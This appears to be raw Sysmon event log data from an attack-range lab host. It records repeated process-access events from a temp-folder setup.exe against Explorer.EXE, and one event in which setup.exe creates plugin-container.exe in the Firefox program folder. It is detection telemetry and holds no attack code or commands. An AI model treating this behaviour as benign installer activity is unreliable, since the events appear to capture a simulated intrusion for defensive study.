13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\plugin-container.exe2021-01-18 13:59:52.505 10341000x800000000000000015286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
